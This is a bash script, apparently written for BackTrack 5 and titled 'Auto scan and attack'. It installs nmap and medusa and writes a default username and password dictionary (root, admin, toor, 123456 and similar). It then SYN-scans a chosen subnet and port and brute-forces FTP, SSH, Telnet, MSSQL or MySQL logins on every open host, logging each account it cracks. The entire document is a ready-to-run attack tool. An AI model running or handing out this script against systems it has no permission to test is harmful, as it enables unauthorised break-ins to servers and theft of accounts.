#!/bin/bash #autonmap.sh : #Author: Qingzheng #platform: backtrack5 r3 function Usage(){ echo "########################################" echo "#Auto scan and attack #" echo "#autonmap.sh #" echo "#Author: Qingzheng #" echo "########################################" echo -e "${red}Example:" echo -e "Rhost:>> 192.168.0.0/24" echo -e "Rport:>> 21 (21/22/23/1433/3306)$white" echo } function DictCreate(){ if [ ! -d $(pwd)/tmp ]; then mkdir $(pwd)/tmp if [ ! -e $(pwd)/tmp/user.dict ]; then echo -en "root " >$(pwd)/tmp/user.dict; fi if [ ! -e $(pwd)/tmp/passwd.dict ]; then echo -en "admin administrator administrators root mysql admin123 admini123 toor toor123 mysql mysql123 123456 12345678 " >$(pwd)/tmp/passwd.dict fi fi } function Checknmapmedusa(){ if [ ! -e /usr/local/bin/nmap ]; then echo -e "[$blue>$white] Start install nmap";apt-get install -y nmap | sed 's/^/[nmap]/g'; fi if [ ! -e /usr/local/bin/medusa ]; then echo -e "[$blue>$white] Start install medusa";apt-get install -y medusa | sed 's/^/[medusa]/g'; fi } function ScanAttack(){ echo -e "[$blue>$white] Starting scan..." xterm -geometry 80x20+80+0 -e "nmap -v -sS -sV -oG $(pwd)/tmp/scan-$Rport -p $Rport $Rhost" grep "$Rport/open/tcp//$Rserver//" $(pwd)/tmp/scan-$Rport | cut -d' ' -f2 >$(pwd)/tmp/scan-analyze-$Rport && rm -rf $(pwd)/tmp/scan-$Rport sed "s/^/ > /g" $(pwd)/tmp/scan-analyze-$Rport if [ -s $(pwd)/tmp/scan-analyze-$Rport ]; then echo -e "[$blue>$white] Straring try crack..." xterm -geometry 80x20+80+640 -e medusa -U $(pwd)/tmp/user.dict -P $(pwd)/tmp/passwd.dict -e ns -v 10 -H $(pwd)/tmp/scan-analyze-$Rport -M $Rserver -O $(pwd)/tmp/output-$Rport if [ -s $(pwd)/tmp/output-$Rport ]; then grep "ACCOUNT FOUND: " $(pwd)/tmp/output-$Rport | awk '{print $3,$4,$5,$6,$7,$8,$9}' | sed "s/$Rserver/>/g" | uniq | tee -a $(pwd)/tmp/output-$Rport.lst && rm -rf $(pwd)/tmp/output-$Rport echo -e "[$blue>$white] Medusa DONE!!" else echo -e "[$blue-$white] Not founding passwd!!" fi else echo -e "[$blue>$white] Not founding hosts" fi } ##################################################################### ##################################################################### function Main(){ blue="e[01;34m" red="e[01;31m" white="e[00m" underline="\033[4m" Usage DictCreate Checknmapmedusa while [ True ];do echo -en "${underline}Rhost$white:$blue>>$white" read Rhost echo -en "${underline}Rport$white:$blue>>$white" read Rport case $Rport in "21") Rserver=ftp ScanAttack ;; "22") Rserver=ssh ScanAttack ;; "23") Rserver=telnet ScanAttack ;; "1433") Rserver=mssql ScanAttack ;; "3306") Rserver=mysql ScanAttack ;; *) echo -e "[$blue>$white] Input error! Quit!!" break ;; esac done } ######################################################### ######################################################### Main